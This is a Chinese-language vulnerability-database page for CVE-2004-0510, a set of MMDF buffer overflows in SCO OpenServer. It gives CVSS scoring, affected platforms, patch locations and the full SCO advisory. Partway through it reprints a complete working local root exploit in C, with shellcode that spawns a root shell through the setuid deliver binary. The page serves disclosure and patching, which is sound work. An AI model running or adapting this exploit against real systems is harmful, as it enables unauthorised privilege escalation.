CVE-2004-0510
CVSS7.2
发布时间 :2004-12-23 00:00:00
修订时间 :2016-10-17 22:45:49
NMCOEPS    

[原文]Multiple buffer overflows in MMDF on OpenServer 5.0.6 and 5.0.7, and possibly other operating systems, may allow attackers to execute arbitrary code, as demonstrated via the execmail program.


[CNNVD]OpenServer MMDF多个缓冲区溢出漏洞(CNNVD-200412-101)

        
        OpenServer是一款由Caldera维护的商业性质Unix类型操作系统。
        OpenServer的MMDF包中execmail存在缓冲区溢出,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击,提升权限。
        另外MMDF存在NULL指针废弃和Core Dump问题,可导致应用程序崩溃,
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sco:openserver:5.0.6
cpe:/o:sco:openserver:5.0.6a
cpe:/o:sco:openserver:5.0.7

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0510
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0510
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-101
(官方数据源) CNNVD

- 其它链接及资源

ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.7/SCOSA-2004.7.txt
(UNKNOWN)  SCO  SCOSA-2004.7
http://marc.info/?l=bugtraq&m=109889281711636&w=2
(UNKNOWN)  BUGTRAQ  20041027 MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86
http://www.deprotect.com/advisories/DEPROTECT-20040206.txt
(UNKNOWN)  MISC  http://www.deprotect.com/advisories/DEPROTECT-20040206.txt
http://www.securityfocus.com/bid/10758
(VENDOR_ADVISORY)  BID  10758
http://xforce.iss.net/xforce/xfdb/16738
(VENDOR_ADVISORY)  XF  openserver-mmdf-bo(16738)

- 漏洞信息

OpenServer MMDF多个缓冲区溢出漏洞
高危 边界条件错误
2004-12-23 00:00:00 2005-10-20 00:00:00
远程※本地  
        
        OpenServer是一款由Caldera维护的商业性质Unix类型操作系统。
        OpenServer的MMDF包中execmail存在缓冲区溢出,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击,提升权限。
        另外MMDF存在NULL指针废弃和Core Dump问题,可导致应用程序崩溃,
        

- 公告与补丁

        厂商补丁:
        Caldera
        -------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        OpenServer 5.0.7
         4.1 Location of Fixed Binaries
         ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.7
         SCO OpenServer Release 5.0.7 Maintenance Pack 3及之后版本也包含此补丁:
        
        http://www.sco.com/support/update/download/osr507list.html.

        OpenServer 5.0.6
         5.1 Location of Fixed Binaries
         ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.7

- 漏洞信息 (602)

SCO Openserver 5.0.7 (MMDF deliver) Local Root Exploit (EDBID:602)
sco local
2004-10-26 Verified
0 Ramon Valle
N/A [点击下载]
/*
 *  MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86
 *  Copyright 2004 Ramon de Carvalho Valle
 *
 */

char shellcode[]=           /*  36 bytes                          */
    "\x68\xff\xf8\xff\x3c"  /*  pushl   $0x3cfff8ff               */
    "\x6a\x65"              /*  pushl   $0x65                     */
    "\x89\xe6"              /*  movl    %esp,%esi                 */
    "\xf7\x56\x04"          /*  notl    0x04(%esi)                */
    "\xf6\x16"              /*  notb    (%esi)                    */
    "\x31\xc0"              /*  xorl    %eax,%eax                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x68""/ksh"            /*  pushl   $0x68736b2f               */
    "\x68""/bin"            /*  pushl   $0x6e69622f               */
    "\x89\xe3"              /*  movl    %esp,%ebx                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x50"                  /*  pushl   %eax                      */
    "\x53"                  /*  pushl   %ebx                      */
    "\xb0\x3b"              /*  movb    $0x3b,%al                 */
    "\xff\xd6"              /*  call    *%esi                     */
;

main(int argc,char **argv) {
    char buffer[16384],address[4],*p;
    int i;

    printf("MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86\n");
    printf("Copyright 2004 Ramon de Carvalho Valle\n\n");

    *((unsigned long *)address)=(unsigned long)buffer-256+5120+4097;

    sprintf(buffer,"-c");
    p=buffer+2;
    for(i=0;i<5120;i++) *p++=address[i%4];
    for(i=0;i<8192;i++) *p++=0x90;
    for(i=0;i<strlen(shellcode);i++) *p++=shellcode[i];
    *p=0;

    execl("/usr/mmdf/bin/deliver","deliver",buffer,0);
}



// milw0rm.com [2004-10-26]
		

- 漏洞信息 (F34740)

osx86_mmdfdeliver.c (PacketStormID:F34740)
2004-10-26 00:00:00
Ramon de C Valle  
exploit,x86,local,root
CVE-2004-0510
[点击下载]

MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86.

- 漏洞信息 (F33830)

SCOSA-2004.7.txt (PacketStormID:F33830)
2004-07-20 00:00:00
 
advisory,overflow,vulnerability
CVE-2004-0510,CVE-2004-0511,CVE-2004-0512
[点击下载]

SCO Security Advisory - Multiple vulnerabilities have been found in the MMDF binaries included with SCO Openserver versions 5.0.6 and 5.0.7. These include buffer overflows, null dereferences, and core dumps.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


______________________________________________________________________________

			SCO Security Advisory

Subject:		OpenServer 5.0.6 OpenServer 5.0.7 : MMDF Various buffer overflows and other security issues
Advisory number: 	SCOSA-2004.7
Issue date: 		2004 July 14
Cross reference: 	sr884728 fz528322 erg712434 CAN-2004-0510 CAN-2004-0511 CAN-2004-0512
______________________________________________________________________________


1. Problem Description

	Deprotect discovered a buffer overflow in execmail.  After reviewing 
	our code we determined the whole MMDF package needed a security audit.

	Various buffer overflows and other security issues that affect all 
	MMDF binaries have been corrected. 

	All but one of the MMDF binaries that were setuid root are no 
	longer setuid. 

	Additional changes in this version of MMDF are documented at
	ftp://ftp.sco.com/pub/openserver5/507/mp/mp3/osr507mp3.html#rn507mp_mmdf
	and in the updated man pages which are included in SCOSA-2004.7

	The Common Vulnerabilities and Exposures project (cve.mitre.org)
        has assigned MMDF buffer overflows the name CAN-2004-0510.

	The Common Vulnerabilities and Exposures project (cve.mitre.org)
        has assigned MMDF null dereferences the name CAN-2004-0511.

	The Common Vulnerabilities and Exposures project (cve.mitre.org)
        has assigned MMDF core dumps the name CAN-2004-0512.

2. Vulnerable Supported Versions

	System			Binaries
	----------------------------------------------------------------------
	OpenServer 5.0.6 	MMDF Distribution
	OpenServer 5.0.7 	MMDF Distribution

3. Solution

	The proper solution is to install the latest packages.

4. OpenServer 5.0.7

	4.1 Location of Fixed Binaries

	ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.7

	The fixes are also available in SCO OpenServer Release 5.0.7 
	Maintenance Pack 3 or later.  See
	http://www.sco.com/support/update/download/osr507list.html.

5. OpenServer 5.0.6   

	5.1 Location of Fixed Binaries

	ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.7

	5.2 Verification

	MD5 (VOL.000.000) = 7d079342022ff408e479184fab3ee86b

	md5 is available for download from
		ftp://ftp.sco.com/pub/security/tools

	5.3 Installing Fixed Binaries

	Upgrade the affected binaries with the following sequence:

	1) Download the VOL* files to a directory

	2) Run the custom command, specify an install from media
	images, and specify the download directory as the location of
	the images.


6. References

	Specific references for this advisory:
		http://www.deprotect.com/advisories/DEPROTECT-20040206.txt

	SCO security resources:
		http://www.sco.com/support/security/index.html

	SCO security advisories via email
		http://www.sco.com/support/forums/security.html

	This security fix closes SCO incidents sr884728 fz528322
	erg712434.


7. Disclaimer

	SCO is not responsible for the misuse of any of the information
	we provide on this website and/or through our security
	advisories. Our advisories are a service to our customers
	intended to promote secure installation and use of SCO
	products.


8. Acknowledgments

	SCO would like to thank Deprotect which describes itself 
	as "a Swedish based security company divided into four 
	divisions; Managed Security Services, Security Services, 
	Products and Development and our Security Academy."

______________________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (SCO/UNIX_SVR5)

iD8DBQFA/BA7aqoBO7ipriERAlNkAJ4wc5INlU2E1vS0FvfHIBZBWVZncgCgguCU
5eD+BJzK6BCNVJAbF1y1Jic=
=yfK9
-----END PGP SIGNATURE-----
    

- 漏洞信息

8095
SCO OpenServer MMDF execmail Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A remote overflow exists in OpenServer. The execmail program fails to validate user input resulting in a buffer overflow. With a specially crafted request, an attacker can cause privilege escalation to root resulting in a loss of integrity.

- 时间线

2004-02-06 Unknow
2004-10-27 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, SCO has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

SCO Multi-channel Memorandum Distribution Facility Multiple Vulnerabilities
Boundary Condition Error 10758
Yes Yes
2004-07-20 12:00:00 2009-07-12 06:16:00
Discovery of the buffer overflow vulnerabilities is credited to the analysts at Deprotect. The individuals responsible for the discovery of the other issues are currently unknown; they were disclosed in the referenced vendor advisory.

- 受影响的程序版本

SCO MMDF
+ SCO Open Server 5.0.7
+ SCO Open Server 5.0.6 a
+ SCO Open Server 5.0.6

- 漏洞讨论

It has been reported that the SCO Multi-channel Memorandum Distribution Facility (MMDF) is affected by multiple vulnerabilities. These issues are due to a failure of the utility to properly validate buffer boundaries when copying user-supplied input.

These issues are known to be exploitable locally, however due to the nature of the application it is likely that remote exploitation is possible as well, although this is not confirmed.

An attacker might leverage these issues to execute arbitrary code in the context of the vulnerable utility; many of the affected utilities are setuid binaries by default. These issues might also be leveraged to cause the affected utility to crash, denying service to legitimate users.

- 漏洞利用

The following exploit is made available by Ramon de Carvalho Valle &lt;ramondecarvalho@yahoo.com.br&gt;:

- 解决方案

SCO has released advisory SCOSA-2004.7 along with fixes dealing with this issue.


SCO MMDF

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站